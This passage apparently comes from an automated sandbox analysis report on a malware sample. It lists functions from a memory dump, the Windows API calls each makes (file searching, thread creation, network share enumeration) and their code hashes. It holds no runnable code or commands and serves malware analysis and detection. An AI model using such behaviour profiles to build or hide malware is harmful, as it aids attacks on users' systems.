                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _wcsstr$Find$CloseExtensionFileNextPath
                                                                                                  • String ID:
                                                                                                  • API String ID: 2799698630-0
                                                                                                  • Opcode ID: 41a7b890d6f185e6d3b7096a63421ab09f3a5c98ea4144359011e08bb50704bb
                                                                                                  • Instruction ID: 592ddce1c9e1e5cfa59d57150785a26a3e4c117b2b27af8fcf66b15e1817c27a
                                                                                                  • Opcode Fuzzy Hash: 41a7b890d6f185e6d3b7096a63421ab09f3a5c98ea4144359011e08bb50704bb
                                                                                                  • Instruction Fuzzy Hash: 2651A170C10219DAEF20EF50DD457DEBBB5BF11318F0084BAD40D66251E77A9A88CF5A
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __lock_file_memset
                                                                                                  • String ID:
                                                                                                  • API String ID: 26237723-0
                                                                                                  • Opcode ID: ec7de5a39abe2845f11f52a81bd36c28634768c55700e96bbbeb2b9dcf13c77c
                                                                                                  • Instruction ID: 8aaa213fcace5e7c05e019f7a66d04825f6427c386266dc7da7d056fd81ecd6b
                                                                                                  • Opcode Fuzzy Hash: ec7de5a39abe2845f11f52a81bd36c28634768c55700e96bbbeb2b9dcf13c77c
                                                                                                  • Instruction Fuzzy Hash: C701B131801209FBCF22AFB69D0189F7F61AF41324F14813BF82856261D77D8A22EB95
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                    • Part of subcall function 00495208: __getptd_noexit.LIBCMT ref: 00495208
                                                                                                  • __lock_file.LIBCMT ref: 00493A7D
                                                                                                    • Part of subcall function 00490E53: __lock.LIBCMT ref: 00490E76
                                                                                                  • __fclose_nolock.LIBCMT ref: 00493A88
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                  • String ID:
                                                                                                  • API String ID: 2800547568-0
                                                                                                  • Opcode ID: e3a99c62dea9e3315ff74c3a1b049167e9d38abb5e656943853c40344e819ea5
                                                                                                  • Instruction ID: 54f0a758d8653d9817221c64f6b404b6d83337eab44ca8f32a6460a14e004108
                                                                                                  • Opcode Fuzzy Hash: e3a99c62dea9e3315ff74c3a1b049167e9d38abb5e656943853c40344e819ea5
                                                                                                  • Instruction Fuzzy Hash: EDF09671801704AADF11AF7A880175E6E946F4233DF11816FE4A59A1C1CB7C8B029B5D
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • __lock_file.LIBCMT ref: 00493489
                                                                                                  • __ftell_nolock.LIBCMT ref: 00493494
                                                                                                    • Part of subcall function 00495208: __getptd_noexit.LIBCMT ref: 00495208
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                                                                  • String ID:
                                                                                                  • API String ID: 2999321469-0
                                                                                                  • Opcode ID: e9bbea16c9de3e52cd2893e0a3a395b65dae028b3a61a7c907736880e8096494
                                                                                                  • Instruction ID: 3ba6e825c9ab1eb9d617aca13ac325de67e69c9b0d6e1d3a5155b63eb37fd96f
                                                                                                  • Opcode Fuzzy Hash: e9bbea16c9de3e52cd2893e0a3a395b65dae028b3a61a7c907736880e8096494
                                                                                                  • Instruction Fuzzy Hash: 54F0AE319016049ADF117FB6D80675E6E605F42339F12466FF020D71C1CF7C4A025A59
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • __lock.LIBCMT ref: 0049FB7B
                                                                                                    • Part of subcall function 00498AF7: __mtinitlocknum.LIBCMT ref: 00498B09
                                                                                                    • Part of subcall function 00498AF7: __amsg_exit.LIBCMT ref: 00498B15
                                                                                                    • Part of subcall function 00498AF7: EnterCriticalSection.KERNEL32(00000000,?,004950D7,0000000D), ref: 00498B22
                                                                                                  • __tzset_nolock.LIBCMT ref: 0049FB8E
                                                                                                    • Part of subcall function 0049FE47: __lock.LIBCMT ref: 0049FE6C
                                                                                                    • Part of subcall function 0049FE47: ____lc_codepage_func.LIBCMT ref: 0049FEB3
                                                                                                    • Part of subcall function 0049FE47: __getenv_helper_nolock.LIBCMT ref: 0049FED4
                                                                                                    • Part of subcall function 0049FE47: _free.LIBCMT ref: 0049FF07
                                                                                                    • Part of subcall function 0049FE47: _strlen.LIBCMT ref: 0049FF0E
                                                                                                    • Part of subcall function 0049FE47: __malloc_crt.LIBCMT ref: 0049FF15
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __lock$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__malloc_crt__mtinitlocknum__tzset_nolock_free_strlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 1282695788-0
                                                                                                  • Opcode ID: c0d39e998de827b0f04c0d6ee62cf035245b2667ffc2095dfbc860b67b7aeb60
                                                                                                  • Instruction ID: cbb506addcacd7a819adc065025cb4c0b461e653e9e33a604cd77bab8ca6456a
                                                                                                  • Opcode Fuzzy Hash: c0d39e998de827b0f04c0d6ee62cf035245b2667ffc2095dfbc860b67b7aeb60
                                                                                                  • Instruction Fuzzy Hash: 0FE0E674441744DBDF20ABB6DD1A7187964AB11329F10913FD425611D24FBC15CDDB2F
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • ___crtCorExitProcess.LIBCMT ref: 00497B11
                                                                                                    • Part of subcall function 00497AD7: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,00497B16,00000000,?,00498BCA,000000FF,0000001E,00577BD0,00000008,00498B0E,00000000,00000000), ref: 00497AE6
                                                                                                    • Part of subcall function 00497AD7: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 00497AF8
                                                                                                  • ExitProcess.KERNEL32 ref: 00497B1A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                  • String ID:
                                                                                                  • API String ID: 2427264223-0
                                                                                                  • Opcode ID: 03d3de33091e0c25d22551935f4fcb6d6f64d9e6c912831c8ed4282104ae6f52
                                                                                                  • Instruction ID: d26267cb83a6332c2adc7ad2ec5b2a71e15726822502e50ba428a7760f8a4633
                                                                                                  • Opcode Fuzzy Hash: 03d3de33091e0c25d22551935f4fcb6d6f64d9e6c912831c8ed4282104ae6f52
                                                                                                  • Instruction Fuzzy Hash: 11B09230004108BBCF052F52DC0A85E7F2AEB40390F008025F90408131EBB2AE95ABC4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004818DD
                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?), ref: 004818E9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CloseFreeHandleVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 2443081362-0
                                                                                                  • Opcode ID: c816195aeb75334cde028e7fc75a4e94df7f02bfc97cb8320f2eaff7cd45a39d
                                                                                                  • Instruction ID: d59c9860c44860f89c1c9f352d8ac220ac7a313ca761a66a0fcb035db937ada5
                                                                                                  • Opcode Fuzzy Hash: c816195aeb75334cde028e7fc75a4e94df7f02bfc97cb8320f2eaff7cd45a39d
                                                                                                  • Instruction Fuzzy Hash: 5FE08636A015049BC720AB98ED8179DB374F785720F20036AE859733D047352D069B44
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 004869DF
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception
                                                                                                  • String ID:
                                                                                                  • API String ID: 120817956-0
                                                                                                  • Opcode ID: e7d52b61e7d12c863d1fc0916949ace3950779d35bd139e4dbbe89635c17a926
                                                                                                  • Instruction ID: 69c8d426bb00626c0b1f74b6116e0cbebb0cfd1413e4dbd8062cd22cef09aeba
                                                                                                  • Opcode Fuzzy Hash: e7d52b61e7d12c863d1fc0916949ace3950779d35bd139e4dbbe89635c17a926
                                                                                                  • Instruction Fuzzy Hash: CB31F6B1A00601DBCB64EF68C98166FB7F9EB45720F214A3FE855D7780DB389D0487A5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 004867E6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception
                                                                                                  • String ID:
                                                                                                  • API String ID: 120817956-0
                                                                                                  • Opcode ID: 1261047a214a44244904aeb4df8e5f7a916f9b377cbd24abf991a7f72ba65200
                                                                                                  • Instruction ID: f14aaf8c4f52fccd90a02b22cd16434ae1da5b1c723e6eeb3f6ea185e7afdc28
                                                                                                  • Opcode Fuzzy Hash: 1261047a214a44244904aeb4df8e5f7a916f9b377cbd24abf991a7f72ba65200
                                                                                                  • Instruction Fuzzy Hash: 0B3122B1D016019FDB64EF29C98066EBBE4EB40364F114E3EE46A97780D7389A00C7E6
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 004865C5
                                                                                                    • Part of subcall function 00493B4C: _malloc.LIBCMT ref: 00493B64
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 657562460-0
                                                                                                  • Opcode ID: f73d000caae7cbe491897379b9150af46f119f7e079dda8b7859db5c2613ed8b
                                                                                                  • Instruction ID: 607390b195dfea5efce43c9612dbbc9b6e94a7bf6906702592bb391fda2d062f
                                                                                                  • Opcode Fuzzy Hash: f73d000caae7cbe491897379b9150af46f119f7e079dda8b7859db5c2613ed8b
                                                                                                  • Instruction Fuzzy Hash: BC214475900115DBCB14EF1CD980B5EBFE8EF45700F04862AE8098B308D734EA14CBE5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                    • Part of subcall function 00483C40: _memset.LIBCMT ref: 00483C83
                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000008,?,00000000,00000000,?), ref: 004828AA
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiWide_memset
                                                                                                  • String ID:
                                                                                                  • API String ID: 2800726579-0
                                                                                                  • Opcode ID: 98ef22b418cae3936dd0c7793e0ac7192cf4a5f33fd64687b4d4067a0bbf1f30
                                                                                                  • Instruction ID: d59faaac49520b29063b8c888bf67f881816085e3f5e841f7412909d6cc3cba8
                                                                                                  • Opcode Fuzzy Hash: 98ef22b418cae3936dd0c7793e0ac7192cf4a5f33fd64687b4d4067a0bbf1f30
                                                                                                  • Instruction Fuzzy Hash: 0F11E132900219ABDF10EF49CD41B9FBFA8EF01724F00022AF814A7280C7B999198BD6
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0001F130,?,00000000,00000000), ref: 0048FA25
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 2422867632-0
                                                                                                  • Opcode ID: 2b4b304f2378195136fafbfce3f6996a9beaac5eaaffacf481d461fc84ece9c6
                                                                                                  • Instruction ID: 9e1544ff27887fd6c0a19502d9f63f6a3969533b69cac2b945847e1a6fbfdaf8
                                                                                                  • Opcode Fuzzy Hash: 2b4b304f2378195136fafbfce3f6996a9beaac5eaaffacf481d461fc84ece9c6
                                                                                                  • Instruction Fuzzy Hash: 23D05E322483147BE3141A99AC06F867AC88B15B10F00402AB649DA1C0D5A1A810A698
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                    • Part of subcall function 00480BD0: WNetOpenEnumW.MPR(00000002,00000000,00000000,00000000,?), ref: 00480C12
                                                                                                  • SendMessageW.USER32(?,00008004,00000000,00000000), ref: 0048FDA4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: EnumMessageOpenSend
                                                                                                  • String ID:
                                                                                                  • API String ID: 1835186980-0
                                                                                                  • Opcode ID: 3482aef87e58739853dca4a4f48c7035af61fce00ea3770ba409240a39aff8f9
                                                                                                  • Instruction ID: 36b20875d215c79ff652355a5107953f0bcbd85d0fd1ab6798810cc910eddaa3
                                                                                                  • Opcode Fuzzy Hash: 3482aef87e58739853dca4a4f48c7035af61fce00ea3770ba409240a39aff8f9
